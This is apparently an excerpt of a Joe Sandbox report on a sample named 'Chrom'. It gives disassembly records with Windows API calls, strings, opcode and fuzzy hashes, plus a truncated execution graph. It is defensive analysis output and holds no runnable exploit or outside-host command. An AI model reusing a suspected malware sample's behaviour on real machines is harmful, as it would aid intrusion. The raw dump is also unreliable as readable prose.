                                                                                                                                                        • Instruction ID: 5887821bd48b257a389a8619214a73bf64326750db89a50052b3e3f26cdab3d4
                                                                                                                                                        • Opcode Fuzzy Hash: 9d91d721a2435454d66ee30fea597a374f678bd0bf4a4b4aeba8e389cc8d88fc
                                                                                                                                                        • Instruction Fuzzy Hash: 82E0BFB194030CF6EF10BBD1CC46F9D77BC6B05758F110425BA04A51C1E7B4A6598756
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
                                                                                                                                                          • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00416D91
                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00406A8C,00000000), ref: 00416DA9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                        • String ID: shlwapi.dll
                                                                                                                                                        • API String ID: 3150196962-3792422438
                                                                                                                                                        • Opcode ID: 0ba260915fc044c9060a9267e76b53ad6964ed23a45c776f21564570e230f864
                                                                                                                                                        • Instruction ID: 8953b9299a98f99d53b06e6692452402a631d67aef832c0f4ad793a499166b8b
                                                                                                                                                        • Opcode Fuzzy Hash: 0ba260915fc044c9060a9267e76b53ad6964ed23a45c776f21564570e230f864
                                                                                                                                                        • Instruction Fuzzy Hash: 77D01235205620AFD6516B26EC05AAF2AA5EFC2353B064035FC44D2251DB288C4A8669
                                                                                                                                                        APIs
                                                                                                                                                        • InterlockedCompareExchange.KERNEL32(0045EB90,00000000,00000001), ref: 004173DE
                                                                                                                                                        • DeleteCriticalSection.KERNEL32(0045EAE8), ref: 004173F8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CompareCriticalDeleteExchangeInterlockedSection
                                                                                                                                                        • String ID: E
                                                                                                                                                        • API String ID: 1152216905-2089609516
                                                                                                                                                        • Opcode ID: 41052287ff6157aca7ae807cc5e0ab8c053c410c9bf42ce8b0cf4aaaa29973d0
                                                                                                                                                        • Instruction ID: a08b94eee07b275f18df31a14d48185bcbd6fbf62116246691b6506a81ff28e0
                                                                                                                                                        • Opcode Fuzzy Hash: 41052287ff6157aca7ae807cc5e0ab8c053c410c9bf42ce8b0cf4aaaa29973d0
                                                                                                                                                        • Instruction Fuzzy Hash: 6DE0C23580123043DF249B355D08BC63764A701307F000433FF08E1593D3589DC8465E
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(0045EC58,00000104,?,0041545E,?,?,00000000,00000208,?), ref: 0040A3AA
                                                                                                                                                        • wcscpy.MSVCRT ref: 0040A3BA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DirectoryWindowswcscpy
                                                                                                                                                        • String ID: XE
                                                                                                                                                        • API String ID: 3999232144-3649240766
                                                                                                                                                        • Opcode ID: ee863e4ac16fe2bc2a50466a47192c7d1d348325111a7f9272ab4bdfadf89a60
                                                                                                                                                        • Instruction ID: 4a4bab80cec1fde47f2faee4497fd5c8b1cbd1d111bef82ff05efc413ebbe1fc
                                                                                                                                                        • Opcode Fuzzy Hash: ee863e4ac16fe2bc2a50466a47192c7d1d348325111a7f9272ab4bdfadf89a60
                                                                                                                                                        • Instruction Fuzzy Hash: EED0A732819350EFF309AB16FD4688637A4EB05331F10407BF801521A1E7B49E84C68E
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040A189: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040E194,00000000,0040E047,?,00000000,00000208,?), ref: 0040A194
                                                                                                                                                        • wcsrchr.MSVCRT ref: 0040E197
                                                                                                                                                        • wcscat.MSVCRT ref: 0040E1AD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileModuleNamewcscatwcsrchr
                                                                                                                                                        • String ID: _lng.ini
                                                                                                                                                        • API String ID: 383090722-1948609170
                                                                                                                                                        • Opcode ID: fc401660792f3259079d155ab2926aa0832a50f509c5fa83b23360e965731080
                                                                                                                                                        • Instruction ID: 8b583429bb2f73c15531c1fc6ec83a8602d0f7af3b9842199d22d9f13e476b24
                                                                                                                                                        • Opcode Fuzzy Hash: fc401660792f3259079d155ab2926aa0832a50f509c5fa83b23360e965731080
                                                                                                                                                        • Instruction Fuzzy Hash: DBC0127668261020F12633226D03BAA02484F03709F25003BFC012E1C2ABAC56A240AF
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040AE2A: memset.MSVCRT ref: 0040AE4A
                                                                                                                                                          • Part of subcall function 0040AE2A: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040AE67
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscpy.MSVCRT ref: 0040AE7A
                                                                                                                                                          • Part of subcall function 0040AE2A: wcscat.MSVCRT ref: 0040AE90
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNELBASE(00000000), ref: 0040AEA1
                                                                                                                                                          • Part of subcall function 0040AE2A: LoadLibraryW.KERNEL32(?), ref: 0040AEAA
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00416B0A
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                                                                                                        • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                        • API String ID: 2773794195-880857682
                                                                                                                                                        • Opcode ID: c1b45a8134029c03373e9e62df4e01b2212aa259df3a417208d0da953679c99d
                                                                                                                                                        • Instruction ID: 99dbe11720a893006f653479ba407f655e67b82aae680071a902f62ebf455638
                                                                                                                                                        • Opcode Fuzzy Hash: c1b45a8134029c03373e9e62df4e01b2212aa259df3a417208d0da953679c99d
                                                                                                                                                        • Instruction Fuzzy Hash: 6BD0C7B1548311A9E7045B72BC097113654A711307F144077B800D2997EB78D9459F1D
                                                                                                                                                        APIs
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000000,?), ref: 0042D9AB
                                                                                                                                                        • memcpy.MSVCRT(?,?,?,?), ref: 0042D9E4
                                                                                                                                                        • memset.MSVCRT ref: 0042D9FA
                                                                                                                                                        • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042DA33
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcpy$memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 438689982-0
                                                                                                                                                        • Opcode ID: 8146a5a9f1215ff6fa9f3d5588c159669d09d75e34f759fa96b1d6c6d51f12fb
                                                                                                                                                        • Instruction ID: 22161e07a8dd0176d215964da5b89ff37004ec298054f59c146abe01b4a1168d
                                                                                                                                                        • Opcode Fuzzy Hash: 8146a5a9f1215ff6fa9f3d5588c159669d09d75e34f759fa96b1d6c6d51f12fb
                                                                                                                                                        • Instruction Fuzzy Hash: 635182B5E00219EFDF14EF55DC42AAEBBB5FF04340F55806AF904AA241E7389E50CB99
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0040A6FB: memset.MSVCRT ref: 0040A709
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040E389
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E3B0
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E3D1
                                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E3F2
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ??2@$memset
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1860491036-0
                                                                                                                                                        • Opcode ID: eb350b77a03d3952c19d09036869a2b52fa89c555923169d256a5bb9e8a87cdf
                                                                                                                                                        • Instruction ID: a8f70b2b8f0220c2fb0a7082b37bd867e83ef99612ffde3d47a64c7db78a1032
                                                                                                                                                        • Opcode Fuzzy Hash: eb350b77a03d3952c19d09036869a2b52fa89c555923169d256a5bb9e8a87cdf
                                                                                                                                                        • Instruction Fuzzy Hash: F521E6B0A117008FD7619F2B8444A15FFE8FF90310B2689AFD559CB2B2D3B8C450CB25
                                                                                                                                                        APIs
                                                                                                                                                        • wcslen.MSVCRT ref: 0040AF08
                                                                                                                                                          • Part of subcall function 00409FB3: malloc.MSVCRT ref: 00409FCF
                                                                                                                                                          • Part of subcall function 00409FB3: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040B018,00000002,?,00000000,?,0040B34B,00000000,?,00000000), ref: 00409FE7
                                                                                                                                                          • Part of subcall function 00409FB3: free.MSVCRT ref: 00409FF0
                                                                                                                                                        • free.MSVCRT ref: 0040AF2E
                                                                                                                                                        • free.MSVCRT ref: 0040AF51
                                                                                                                                                        • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040B39C,?,000000FF), ref: 0040AF75
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 726966127-0
                                                                                                                                                        • Opcode ID: 331cd75d25474b200007b092dd27d2fe5eea30cc0ecd3ad211855935377a92b8
                                                                                                                                                        • Instruction ID: 62c255610b828a0a43b98215f9d769f251a011d3a86863779d24e99e918d36f1
                                                                                                                                                        • Opcode Fuzzy Hash: 331cd75d25474b200007b092dd27d2fe5eea30cc0ecd3ad211855935377a92b8
                                                                                                                                                        • Instruction Fuzzy Hash: C0218EB1100705EFD720EF18C88189AB3F4EF453247108A2EF9669B2D1C735F919CB55
                                                                                                                                                        APIs
                                                                                                                                                        • memcmp.MSVCRT(?,0045B238,00000010,00000000,00404FFF,?,00404592,00404FFF,?,00404FFF,00409A5B,00000000), ref: 0040445E
                                                                                                                                                          • Part of subcall function 004043D9: memcmp.MSVCRT(00404FFF,0040447D,00000004,000000FF), ref: 004043F7
                                                                                                                                                          • Part of subcall function 004043D9: memcpy.MSVCRT(00000367,00405019,48891048,?), ref: 00404426
                                                                                                                                                          • Part of subcall function 004043D9: memcpy.MSVCRT(-00000269,0040501E,00000060,00000367,00405019,48891048,?), ref: 0040443B
                                                                                                                                                        • memcmp.MSVCRT(?,00000000,0000000E,00000000,00404FFF,?,00404592,00404FFF,?,00404FFF,00409A5B,00000000), ref: 00404496
                                                                                                                                                        • memcmp.MSVCRT(?,00000000,0000000B,00000000,00404FFF,?,00404592,00404FFF,?,00404FFF,00409A5B,00000000), ref: 004044C7
                                                                                                                                                        • memcpy.MSVCRT(0000023E,00404FFF,?), ref: 004044E4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: memcmp$memcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 231171946-0
                                                                                                                                                        • Opcode ID: 02b7e515e6cb7942f6ab12f07e0d827038bf1469a5ded1db4bdf5d811a63220b
                                                                                                                                                        • Instruction ID: 50c4ff2e8450c3fce798df969388a048485be3917a12ccca82d2995326f9277d
                                                                                                                                                        • Opcode Fuzzy Hash: 02b7e515e6cb7942f6ab12f07e0d827038bf1469a5ded1db4bdf5d811a63220b
                                                                                                                                                        • Instruction Fuzzy Hash: 2B11A5F16003146AFB2026129C06F9A3758EB91758F10843FFF44641C2FABEA950566E
                                                                                                                                                        APIs
                                                                                                                                                        • strlen.MSVCRT ref: 0040B6FE
                                                                                                                                                        • free.MSVCRT ref: 0040B721
                                                                                                                                                          • Part of subcall function 00409FB3: malloc.MSVCRT ref: 00409FCF
                                                                                                                                                          • Part of subcall function 00409FB3: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040B018,00000002,?,00000000,?,0040B34B,00000000,?,00000000), ref: 00409FE7
                                                                                                                                                          • Part of subcall function 00409FB3: free.MSVCRT ref: 00409FF0
                                                                                                                                                        • free.MSVCRT ref: 0040B752
                                                                                                                                                        • memcpy.MSVCRT(00000000,?,00000000,00000000,00406D5E,?), ref: 0040B77F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: free$memcpy$mallocstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3669619086-0
                                                                                                                                                        • Opcode ID: 97e23aac66076e39f365f82e397f054d7c8dc4d8bc002d43dba8b43fe139d604
                                                                                                                                                        • Instruction ID: a2faa610dd64c27b0c2ef2c48459d55f7a4c7651722976a7707f5b611db7f3cc
                                                                                                                                                        • Opcode Fuzzy Hash: 97e23aac66076e39f365f82e397f054d7c8dc4d8bc002d43dba8b43fe139d604
                                                                                                                                                        • Instruction Fuzzy Hash: C6115A716043059FD730AB18EC8192637A6EB8733AB24813BF9049B3A3C735D8148BDD
                                                                                                                                                        APIs
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0041A0CF,000000FF,00000000,00000000,00419CBA,?,?,00419CBA,0041A0CF,00000000,?,0041A33C,?,00000000), ref: 00419356
                                                                                                                                                        • malloc.MSVCRT ref: 0041935E
                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,0041A0CF,000000FF,00000000,00000000,?,00419CBA,0041A0CF,00000000,?,0041A33C,?,00000000,00000000,?), ref: 00419375
                                                                                                                                                        • free.MSVCRT ref: 0041937C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2605342592-0
                                                                                                                                                        • Opcode ID: e4beb7e75d6b6867dc320311ec8e335ac11e6b54827e84fb66ef34ac5fc0bb4b
                                                                                                                                                        • Instruction ID: ea87104fc79d75f86d2c504ed11776472b4b13713310e55314d530160130750a
                                                                                                                                                        • Opcode Fuzzy Hash: e4beb7e75d6b6867dc320311ec8e335ac11e6b54827e84fb66ef34ac5fc0bb4b
                                                                                                                                                        • Instruction Fuzzy Hash: C2F0376660521E7BD71025A55C40D77779CDB8A679B11073BFD10E21C1ED59DC0016B4
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000004.00000002.1693772779.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 00000004.00000002.1693760044.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693803409.000000000044F000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693817773.000000000045E000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                        • Associated: 00000004.00000002.1693845131.0000000000474000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_4_2_400000_Chrom.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1961120804-0
                                                                                                                                                        • Opcode ID: 0805737b1f039988677200671bcaaa36b03551ad30adce6ee1146d80a995da50
                                                                                                                                                        • Instruction ID: 1861b29a0bf7327a5836ebdd28897080e635c1e607cd20ba3add047366222a10
                                                                                                                                                        • Opcode Fuzzy Hash: 0805737b1f039988677200671bcaaa36b03551ad30adce6ee1146d80a995da50
                                                                                                                                                        • Instruction Fuzzy Hash: 57E0E532505209BAEF017FA2D9068CE3B95EF06379B51483BFC0892041EB3DE561879A

                                                                                                                                                        Execution Graph

                                                                                                                                                        Execution Coverage:9.8%
                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                        Total number of Nodes:233
                                                                                                                                                        Total number of Limit Nodes:36
                                                                                                                                                        execution_graph 39435 6f5f7f1 39437 6f5f821 39435->39437 39436 6f5fc00 WaitMessage 39436->39437 39437->39436 39438 6f5f8ac 39437->39438 39441 6f5fcf8 39437->39441 39445 6f5fd00 PeekMessageW 39437->39445 39442 6f5fcf1 39441->39442 39442->39441 39443 6f5fd00 PeekMessageW 39442->39443 39444 6f5fd77 39443->39444 39444->39437 39446 6f5fd77 39445->39446 39446->39437 39516 97fad0 39517 97fb38 CreateWindowExW 39516->39517 39519 97fbf4 39517->39519 39711 87b7697 39712 87b76a1 39711->39712 39713 87b0338 2 API calls 39712->39713 39714 87b77f6 39712->39714 39713->39714 39520 976d58 39521 976d68 39520->39521 39522 976d79 39521->39522 39525 976db7 39521->39525 39530 976e7f 39521->39530 39526 976df2 39525->39526 39527 976ee9 39526->39527 39535 977011 39526->39535 39539 977020 39526->39539 39527->39522 39531 976e84 39530->39531 39532 976ee9 39531->39532 39533 977011 9 API calls 39531->39533 39534 977020 9 API calls 39531->39534 39532->39522 39533->39532 39534->39532 39536 97702d 39535->39536 39537 977067 39536->39537 39543 976a90 39536->39543 39537->39527 39541 97702d 39539->39541 39540 977067 39540->39527 39541->39540 39542 976a90 9 API calls 39541->39542 39542->39540 39544 976a9b 39543->39544 39546 977d80 39544->39546 39547 977204 39544->39547 39546->39546 39548 97720f 39547->39548 39549 977dfe 39548->39549 39564 97ade2 39548->39564 39575 97adf0 39548->39575 39586 97aef8 39548->39586 39597 97af08 39548->39597 39608 97b168 39548->39608 39617 97b340 39548->39617 39625 97b330 39548->39625 39633 977234 39549->39633 39551 977e18 39638 977244 39551->39638 39554 977e29 39554->39546 39565 97ae28 39564->39565 39566 97af08 4 API calls 39565->39566 39567 97ae7d 39565->39567 39568 97b197 39566->39568 39567->39549 39571 97b397 39568->39571 39574 97b2ea 39568->39574 39656 97a0a4 GetFocus 39568->39656 39570 97b43f 39572 977244 4 API calls 
